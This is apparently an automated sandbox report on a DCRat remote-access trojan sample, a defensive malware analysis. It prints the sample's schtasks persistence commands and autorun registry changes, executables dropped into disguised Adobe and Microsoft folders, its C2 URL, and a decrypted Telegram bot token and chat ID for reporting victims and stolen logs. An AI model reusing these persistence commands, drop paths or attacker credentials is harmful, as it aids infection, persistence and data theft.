Edit tour

Windows Analysis Report
k1iZHyRK6K.exe

Overview

General Information

Sample name:	k1iZHyRK6K.exe renamed because original name is a hash value
Original sample name:	5780DBAE6AC61A88C8D89F216F324146.exe
Analysis ID:	1547752
MD5:	5780dbae6ac61a88c8d89f216f324146
SHA1:	cebcebedc7aaea3a4dd1fbec933cd169bf92e9dc
SHA256:	4b1967b04039c9b7a23651043b38c895cca2eb560de30a960368f82549079605
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains potential unpacker

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Drops executable to a common third party application directory

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

k1iZHyRK6K.exe (PID: 6828 cmdline: "C:\Users\user\Desktop\k1iZHyRK6K.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

schtasks.exe (PID: 3120 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 11 /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4144 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2132 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 1148 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 4008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5941.tmp" "c:\Windows\System32\CSCC093A9EE2E0C4098883B2A265DAA859.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 3220 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3168 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6896 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 7 /tr "'C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3592 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2128 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2188 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\windows multimedia platform\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4008 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 14 /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5960 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5172 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 5 /tr "'C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3736 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2312 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3228 cmdline: schtasks.exe /create /tn "lMBSkpoWMYaHkUMNHfbl" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1368 cmdline: schtasks.exe /create /tn "k1iZHyRK6Kk" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "k1iZHyRK6K" /sc ONLOGON /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6924 cmdline: schtasks.exe /create /tn "k1iZHyRK6Kk" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\k1iZHyRK6K.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7260 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7308 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7324 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

k1iZHyRK6K.exe (PID: 7672 cmdline: "C:\Users\user\Desktop\k1iZHyRK6K.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

k1iZHyRK6K.exe (PID: 2312 cmdline: C:\Users\user\Desktop\k1iZHyRK6K.exe MD5: 5780DBAE6AC61A88C8D89F216F324146)

k1iZHyRK6K.exe (PID: 4008 cmdline: C:\Users\user\Desktop\k1iZHyRK6K.exe MD5: 5780DBAE6AC61A88C8D89F216F324146)

lMBSkpoWMYaHkUMNHfb.exe (PID: 1368 cmdline: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

lMBSkpoWMYaHkUMNHfb.exe (PID: 6300 cmdline: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

lMBSkpoWMYaHkUMNHfb.exe (PID: 7464 cmdline: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

cmd.exe (PID: 7556 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

lMBSkpoWMYaHkUMNHfb.exe (PID: 7616 cmdline: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

cmd.exe (PID: 7836 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7884 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7900 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

lMBSkpoWMYaHkUMNHfb.exe (PID: 8032 cmdline: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

k1iZHyRK6K.exe (PID: 8004 cmdline: "C:\Users\user\Desktop\k1iZHyRK6K.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

lMBSkpoWMYaHkUMNHfb.exe (PID: 8184 cmdline: "C:\Program Files (x86)\windows portable devices\lMBSkpoWMYaHkUMNHfb.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

k1iZHyRK6K.exe (PID: 2084 cmdline: "C:\Users\user\Desktop\k1iZHyRK6K.exe" MD5: 5780DBAE6AC61A88C8D89F216F324146)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://452132cm.n9shteam2.top/Processdownloads", "MUTEX": "DCR_MUTEX-2hFQuLJGsb7uyNm7Vrhw", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
k1iZHyRK6K.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1640485684.0000000000662000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: k1iZHyRK6K.exe PID: 6828	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.k1iZHyRK6K.exe.660000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1148, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\k1iZHyRK6K.exe, ProcessId: 6828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lMBSkpoWMYaHkUMNHfb

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\k1iZHyRK6K.exe, ProcessId: 6828, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\k1iZHyRK6K.exe", ParentImage: C:\Users\user\Desktop\k1iZHyRK6K.exe, ParentProcessId: 6828, ParentProcessName: k1iZHyRK6K.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline", ProcessId: 1148, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\k1iZHyRK6K.exe, ProcessId: 6828, TargetFilename: C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\k1iZHyRK6K.exe", ParentImage: C:\Users\user\Desktop\k1iZHyRK6K.exe, ParentProcessId: 6828, ParentProcessName: k1iZHyRK6K.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rsqbzofw\rsqbzofw.cmdline", ProcessId: 1148, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-03T02:32:16.428299+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.4	49734	TCP
2024-11-03T02:32:57.868359+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.4	49746	TCP

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-03T02:32:13.276414+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49733	37.44.238.250	80	TCP
2024-11-03T02:32:36.148392+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49740	37.44.238.250	80	TCP
2024-11-03T02:32:44.308445+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49741	37.44.238.250	80	TCP
2024-11-03T02:32:52.215984+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49743	37.44.238.250	80	TCP
2024-11-03T02:32:53.791671+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49744	37.44.238.250	80	TCP
2024-11-03T02:33:16.681374+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49828	37.44.238.250	80	TCP
2024-11-03T02:33:25.145277+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49865	37.44.238.250	80	TCP
2024-11-03T02:33:27.261821+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49875	37.44.238.250	80	TCP
2024-11-03T02:33:33.650847+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49903	37.44.238.250	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-03T02:32:00.954111+0100	2803305	3	Unknown Traffic	192.168.2.4	49731	34.117.59.81	443	TCP
2024-11-03T02:32:01.938898+0100	2803305	3	Unknown Traffic	192.168.2.4	49732	34.117.59.81	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: k1iZHyRK6K.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\aMXlVeRh.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\YlLkFAlS.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\YzuQZSWjCd.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\QPVuBgDD.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\CdzqKGoc.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\JanKBv1Gj5.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\IAvfBIwS.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Avira: detection malicious, Label: HEUR/AGEN.1309961
Source: C:\Users\user\Desktop\KGHfuADJ.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt

Found malware configuration

Source: 0.0.k1iZHyRK6K.exe.660000.0.unpack

Malware Configuration Extractor: DCRat {"C2 url": "http://452132cm.n9shteam2.top/Processdownloads", "MUTEX": "DCR_MUTEX-2hFQuLJGsb7uyNm7Vrhw", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for domain / URL

Source: 452132cm.n9shteam2.top	Virustotal: Detection: 13%			Perma Link
Source: http://452132cm.n9shteam2.top/Processdownloads.php	Virustotal: Detection: 10%			Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files (x86)\Windows Portable Devices\lMBSkpoWMYaHkUMNHfb.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\EOeGRUzU.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\HeuFlNGE.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\KGHfuADJ.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\LcDwYjoO.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\QPVuBgDD.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\aMXlVeRh.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\cbCbMxmL.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\fHYCcKHb.log	ReversingLabs: Detection: 23%
Source: C:\Users\user\Desktop\gvcKOXDZ.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\hKLkytLW.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\iUeApcrA.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\rpUzavtu.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Videos\lMBSkpoWMYaHkUMNHfb.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: k1iZHyRK6K.exe	ReversingLabs: Detection: 73%
Source: k1iZHyRK6K.exe	Virustotal: Detection: 65%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\aMXlVeRh.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\eUUurwLd.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\WHyUeLIr.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\bnPvHrDf.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\QPVuBgDD.log	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Multimedia Platform\lMBSkpoWMYaHkUMNHfb.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\XgAKFRwS.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KGHfuADJ.log	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: k1iZHyRK6K.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: k1iZHyRK6K.exe	String decryptor: {"0":[],"TelegramNotifer":{"chatid":"1352653034","bottoken":"7029048088:AAH8Vzn7q0RPUBiYFd_ZaCIagZ3KhqyB0OM","settings":"new user connect ! WiITH ROBLOX\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected ROB\nUsername: {USERNAME}\nPC Name: {PCNAME}\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Full","_1":"False","_2":"False","_3":"False"}}
Source: k1iZHyRK6K.exe	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-2hFQuLJGsb7uyNm7Vrhw","0","","","3","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhV1JJU2pGYVUwbHpTV3BKYVU5cFNtMVpWM2g2V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpiVnBvWWtoT2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
Source: k1iZHyRK6K.exe	String decryptor: [["http://452132cm.n9shteam2.top/","Processdownloads"]]

Source: k1iZHyRK6K.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Microsoft\lMBSkpoWMYaHkUMNHfb.exe	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Microsoft\e589e10572e94b	Jump to behavior
Source: C:\Users\user\Desktop\k1iZHyRK6K.exe	Directory created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\lMBSkpoWMYaHkUMNHfb.exe	Jump to behavior
